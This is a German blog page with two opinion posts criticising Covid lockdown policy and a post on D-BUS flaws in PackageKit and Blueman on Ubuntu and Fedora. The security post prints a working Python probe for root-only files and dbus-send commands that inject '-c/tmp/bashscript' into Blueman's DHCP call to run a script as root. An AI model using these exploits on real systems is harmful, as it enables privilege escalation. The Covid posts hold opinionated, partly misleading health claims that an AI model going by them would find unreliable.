CoronaChroniken: Was habt Ihr denn im Herbst/Winter erwartet?

Posted on by

Liebe Maskierte,

geht es nach den üblichen Verdächtigen, kann der Lockdown-Light Ende November „leider“ nicht beendet werden, da ja jetzt schon klar ist, daß das monatelang gemacht werden muß.

CoronaChroniken: Was habt Ihr denn im Herbst/Winter erwartet?

Herr Drosten meint ja gar, daß die Pandemie nicht mal zu Ostern um wäre: https://www.n-tv.de/panorama/Drosten-Ostern-ist-Pandemie-nicht-beendet-article22138956.html

Das DIW rechnet mit 600.000 Arbeitslosen durch diesen Lockdown alleine, wenn er denn Ende November zu Ende gehen würde. Kosten soll er die Gastro- und Hotelbranche um die 19 Milliarden Euro. Falls Sie auf Rentenzahlungen angewiesen sind, sollten Sie jetzt mal nachrechnen, was dies für Sie bedeuten könnte, denn das sind natürlich auch fehlende Einnahmen in der Rentenkasse.

In Zahlen sieht es derzeit so aus:

Jetzt mal Hand aufs Herz: Hat irgendwer nicht erwartet, daß die Infektionszahlen einer Infektionskrankheit aus dem Grippespektrum in der Grippezeit steigen werden?

Die Hospitalisierungzahlen steigen und eine wichtige Funktion haben die Infektionszahlen, wie ich heute morgen lesen konnte: Die Krankenhäuser können an den Zahlen eine Woche vorher ablesen, wann Sie sich auf was vorbereiten müssen und sich umstrukturieren müssen. 1a.

Hinweis: Grippe ist nur ein Sammelbegriff für Infektionskrankheiten mit annähernd gleicher Symptomatik. Coronaviren gehören da genauso zu, wie Rhino, Ardeno oder Influenza.

In anderen Nachrichten

Die Polizei Braunschweig informiert zur „Querdenker“ Demo, die ich leider verpasst habe, da in der Szene nicht drin bin 🙂 Ich wäre gern als Demo-Beobachter dabei gewesen um mal nachzusehen, wer sich da alles rumtreibt 😀 Hier der Bericht:

Braunschweig 31.10.2020, 12 bis 18 Uhr

Die Polizei begleitete die Versammlungen.

Rund 650 Personen versammelten sich am Samstagmittag auf dem Schlossplatz in der Innenstadt Braunschweigs. Die Polizei kontrollierte die Einhaltung der erforderlichen Hygieneregeln, insbesondere das Tragen der Mund-Nasen-Bedeckung, und leitete in diesem Zusammenhang wegen eines mutmaßlich gefälschten Attestes ein Ermittlungsverfahren wegen des Verdachts der Urkundenfälschung ein.

Zwei Personen, die der rechten Szene angehören, wurden als Ordner in dieser Funktion von der Versammlung ausgeschlossen.

Während des anschließenden Aufzugs mit gleicher Teilnehmerzahl mussten zweimal Personen von Störungen des Aufzugs abgehalten werden. Sie wurden durch die Polizeibeamten zurückgedrängt.

Auf dem Messegelände nahmen in der Spitze bis zu 750 Personen ab dem Nachmittag an der Abschlusskundgebung teil. Die Polizei kontrollierte die Versammlungsteilnehmer, die keine Mund-Nasen-Bedeckung trugen. Hierbei wurden keine Verstöße festgestellt.

Die Polizei resümiert: Ein ruhiger Einsatzverlauf.

Quelle: https://www.presseportal.de/blaulicht/pm/11554/4750123

Offensichtlich kann so eine Demo auch störungsfrei ablaufen, wenn keine Linken oder Rechten dabei sind 🙂

 

 

CoronaChroniken: Was geht da in Frankreich ab?

Posted on by

Liebe Maskierte,

da auch Ihr bald wieder kaserniert werdet, obwohl bei uns eigentlich nichts spannendes passiert ( Neuinfektionszahl wieder ein bisschen gestiegen ), schauen wir uns doch mal unseren Nachbarn Frankreich an.

CoronaChroniken: Was geht da in Frankreich ab?

Vor 2 Tagen hatte ich ja noch eine leichte Entspannung im Graphen drin, die ist aber mit den Nachkorrekturen der Neuinfektionszahlen für Deutschland dann, wie befürchtet, verschwunden. Damit ist der Trend bei uns auch weiter „Aufwärts immer, Abwärts nimmer!“, also genau das was man am Anfang der Winterzeit erwarten würde.

Die Franzosen dürfen ab heute nur noch für eine Stunde am Tag zum Sport nach draußen und benötigen selbst zum Spazierengehen, Einkaufen oder den Arztbesuch einen Passierschein ( A38 vermutlich ). Örtlich ist man auf einen Radius vom 1km um den Wohnort beschränkt. Alle entbehrlichen Firmen werden geschlossen, komischerweise bleiben die Schulen offen. Die Maßnahme ist bislang bis zum 1.Dezember befristet.

Die Neuinfektionen lagen in Frankreich zuletzt bei 46.500 Neuinfizierten am Tag. Das ist schon eine Hausnummer die schnell noch größeres erwarten lässt. Frankreich hält für uns alle aber eine Überraschung parat:

(C) EuroMOMO.eu

Genau wie Berlin, liegt die Sterblichkeit in Frankreich am unteren Grenzwert wenn nicht sogar im Bereich der Untersterblichkeit. Wer da mal sein Bundesland sehen möchte, schreibe bitte seine Gesundheitsministerin oder Minister an, auf daß dieser die Zahlen an EuroMOMO ( empfohlen vom RKI übrigens ) melden solle. Ich habe das getan. Warum das nicht das Bundesamt für Statistik macht, verstehe ich auch nicht. Ist das etwa ein Staatsgeheimnis, wieviele Menschen hier so sterben? Ich denke nicht.

Was jetzt?

Auf der Bundespressekonferenz gestern waren Mediziner von den größten Kliniken aus Nord/Ost/Süd/West vertreten und haben ein bisschen den aktuellen Stand bei Ihnen erklärt. Das größte Problem derzeit sind nicht die fehlen Betten, sondern die fehlenden Pfleger, denn freie Betten gäbe aktuell auf dem Papier jede Menge. Wenn man aber kein Pflegepersonal hat, nutzt das nichts. Als, ich kann es nicht anders nennen, Verzweiflungstat würde ich den Vorschlag werten, doch alle geplanten Operationen abzusagen und die OP-Kräfte an die Betten zu schicken. Das mag für eine Hüftop noch gehen, aber spätestens bei Krebsops wird das problematisch.

Da muß man jetzt die Politik mal fragen: Was habt Ihr eigentlich die letzten 6 Monate gemacht, außer den Teufel an die Wand zu malen? Wo sind die 6 Monate lang ausgebildeten Hilfspflegekräfte, die man jetzt bald bräuchte? Es gab ja schliesslich genug Soloselbstständige, Künstler und andere arbeitslose Menschen, die sicher nicht nein gesagt hätten. Die Kliniken haben Ihre Hausaufgaben gemacht und sich umstrukturiert und damit Ihre Bettenkapazitäten hochgeschraubt. Jetzt fehlen Pfleger und das ja nicht erst seit gestern.  Ich denke, man nennt es Politikversagen. Da ruf ich natürlich auch lieber nach mehr nutzlosen Maßnahmen, als daß ich mein langjähriges Versagen zugeben würde.

Es ist ja auch viel wichtiger, ob man das jetzt „Pfleger und Pflegerinnen“ oder „Pfleger:innen“ oder „Pfleger*nnen“ nennt. An so etwas geilen sich Leute auf, die keine existierenden Probleme lösen wollen, sondern nur heiße:re Luft von sich geben möchten. Wer sich angesprochen fühlt, weiß, daß in ihrem oder seinem Leben etwas schief läuft. Geht Probleme an, die Menschen direkt helfen: Umweltverschmutzung durch Plastik z.b. Ein Beschluss „Lebensmittel kommen nicht mehr mit Plastik in Kontakt“ und die Sache erledigt sich quasi von alleine. Eine weitere große Hilfe wäre so etwas „Auf Lebensmittels, die in gleicher oder besserer Qualität vorort angebaut werden können (Knoblauch z.b. )  gibt es einen entfernungsabhängigen Umweltverschmutzungszoll. Nichts mehr mit Subventionen, sondern Strafen wären die Folge. Das erspart uns dann den sehr fragwürdigen Chinesischen Bio-Knoblauch, statt des deutschen Knoblauchs, den es zwar gibt, der aber mehr Geld kostet, weil der Bauer auch seine Rechnungen bezahlen können muß.

Zurück zu uns

Wer hat sich im Supermarkt, in einer Gaststätte, in einem Restaurant, bei C&A mit Corona angesteckt? Dachte ich mir. Wieso machen wir dann das, was wir derzeit tun? Weil einige wenige Ausnahmen reichen um den Bias ins falsche Licht zu rücken. Mir tun die Gastronomen und Kleinkünstler echt leid, die meisten reißen sich den Arsch auf, machen früh auf und spät zu, erfüllen die Auflagen und sind jetzt wieder die Gelackmeierten. Weniger Verständnis habe ich für Helge Schneider, der Herrn Scholz empfohlen hat einen Jahresdurchschnitt zu erstatten, statt den Vorjahresmonat als Basis heranzuziehen, weil er ja letzten November nichts verdient hätte.

Was wirklich ein nachvollziehbares Problem in der Gastro ist, sind die wenigen (Berliner) Szenelokale, in denen man nicht mal aufs Klo kommt, weil die so derbe voll sind. Diese Ausnahmen sind es, die den anderen die Probleme bereiten und den „Möchtegern-Oberharter-Hund“-Politikern in die Hände spielen. Unseriöse, zum Glück amtslose, Vertreter des Public-Health-Management-Sektors fordern dann auch mal, daß die Polizei in Wohnungen kontrollieren sollte, wenn da mehr als 2 Leute am Fenster rumschleichen. Es gehören immer noch zwei Dinge dazu Herr L.: eine Person, die anstecken kann, und Personen die angesteckt werden können, die wieder zu einem Grad infektiös werden, um erneut als die eine Person zu gelten.

Um den Abschluß mit Frankreich zu bekommen, was ist an einem Bewegungsradius so hilfreich? Es spielt doch nur eine Rolle, wievielen Menschen ich begegnen könnte, und nicht wo das dann genau ist. Außer natürlich, man möchte irgendwann mal die Stadtviertel abschotten können, dann wäre es hilfreich, wenn die Betroffenen alle am selben Ort wären. Das könnt Ihr Euch noch drauf freuen, was da kommen könnte.

 

 

D-BUS: Schwachstellen mit Blueman und PackageKit

Posted on by

Da weiß man gar nicht, wie man anfangen soll, aber .. am Anfang war … D-BUS 🙂  Im neuen Ubuntu 20 … UPDATE: FEDORA 31 & 32 AUCH BETROFFEN …  wurden einige Sicherheitslücken gefunden, mit denen sich u.A. Dateien von Root finden lassen, auf die der Angreifer so gar nicht zugreifen könnte. Ob sich das nur auf Ubuntu bezieht, wird man sehen müssen.

D-BUS: Schwachstellen mit Blueman und PackageKit

Eine Information Disclosure Schwachstelle gibt es im Umgang mit D-BUS und PackageKit, so daß man als normaler angemeldeter Benutzer die Existenz von Dateien prüfen kann, die eigentlich nur Root überhaupt sehen könnte, bspw. alles was im /root/ Directory drin ist:

import dbus

bus = dbus.SystemBus()

apt_dbus_object = bus.get_object("org.freedesktop.PackageKit", "/org/freedesktop/PackageKit")
apt_dbus_interface = dbus.Interface(apt_dbus_object, "org.freedesktop.PackageKit")  

trans = apt_dbus_interface.CreateTransaction()

apt_trans_dbus_object = bus.get_object("org.freedesktop.PackageKit", trans)
apt_trans_dbus_interface = dbus.Interface(apt_trans_dbus_object, "org.freedesktop.PackageKit.Transaction")

apt_trans_dbus_interface.InstallFiles(0, ["/root/.bashrc"])

Möglich macht das eine mangelnde Prüfung, ob der User überhaupt autorisiert ist, diese Anfrage stellen zu dürfen.Es stellt sich raus, Fedora 31 und 32 sind auch von der Schwachstelle betroffen und so sieht das dann aus:

$ python3 ./d-bus-packagekit.py
Traceback (most recent call last):
File „./d-bus-packagekit.py“, line 13, in <module>
apt_trans_dbus_interface.InstallFiles(0, [„/root/.bashrc“])
File „/usr/lib64/python3.7/site-packages/dbus/proxies.py“, line 70, in __call__
return self._proxy_method(*args, **keywords)
File „/usr/lib64/python3.7/site-packages/dbus/proxies.py“, line 145, in __call__
**keywords)
File „/usr/lib64/python3.7/site-packages/dbus/connection.py“, line 651, in call_blocking
message, timeout)
dbus.exceptions.DBusException: org.freedesktop.PackageKit.Transaction.MimeTypeNotSupported: MIME type ‚text/plain‘ not supported /root/.bashrc

Das ist die Antwort für eine Datei, die vorhanden ist. Nachfolgend der gleiche Ablauf für eine Datei, die nicht vorhanden ist:

$ python3 ./d-bus-packagekit.py
Traceback (most recent call last):
File „./d-bus-packagekit.py“, line 13, in <module>
apt_trans_dbus_interface.InstallFiles(0, [„/root/.bashrc333“])
File „/usr/lib64/python3.7/site-packages/dbus/proxies.py“, line 70, in __call__
return self._proxy_method(*args, **keywords)
File „/usr/lib64/python3.7/site-packages/dbus/proxies.py“, line 145, in __call__
**keywords)
File „/usr/lib64/python3.7/site-packages/dbus/connection.py“, line 651, in call_blocking
message, timeout)
dbus.exceptions.DBusException: org.freedesktop.PackageKit.Transaction.NoSuchFile: No such file /root/.bashrc333

Beurteilung:

  • – Man muß auf dem System als Benutzer angemeldet sein.
  • – Man muß sich mühseelig jede Datei einzeln vornehmen, was sich etwas automatisieren läßt, also schon wissen, was man sucht.
    – Man kann nicht auf den Inhalt schliessen.
  • – Es läßt sich so aber einfach feststellen, ob bestimmte Software installiert ist.

Ich halte die Lücke für nicht ganz so gravierend, man sollte sie aber schliessen. Bugreport an Fedora ist raus.

Blueman Local Privilege Escalation or Denial of Service (CVE-2020-15238)

Die Blueman Lücke ist deutlich schlimmer, da man darüber Befehle ausführen kann. Das läßt sich zudem trivial ausnutzen:

dbus-send --print-reply --system \
  --dest=org.blueman.Mechanism \
  /org/blueman/mechanism \
  org.blueman.Mechanism.DhcpClient \
  string:"ens33 down"

ens33 ist das Netzwerkinterface. Funktionieren tut das aber nur dann, wenn auch der dhcpcd installiert ist, was nicht zwangsweise so sein muß. Der Fedora Default ist der dh_client, der so scharf kontrolliert, was man ihm da über den D-BUS übergibt, daß man diese Lücke nur für einen DOS, aber nicht für die Local Privilege Escalation Attacke ausnutzen kann. Die würde so funktionieren:

dbus-send --print-reply --system --dest=org.blueman.Mechanism \
/org/blueman/mechanism org.blueman.Mechanism.DhcpClient \
string:"-c/tmp/bashscript"

Also vorher ein Script anlegen, daß root dann ausführen darf => GGS .. Ganz Große Scheiße!

Wenn Ihr also Blueman und Ubuntu 20 benutzt, dann sorgt doch mal für ein paar Updates auf Eurem System 😉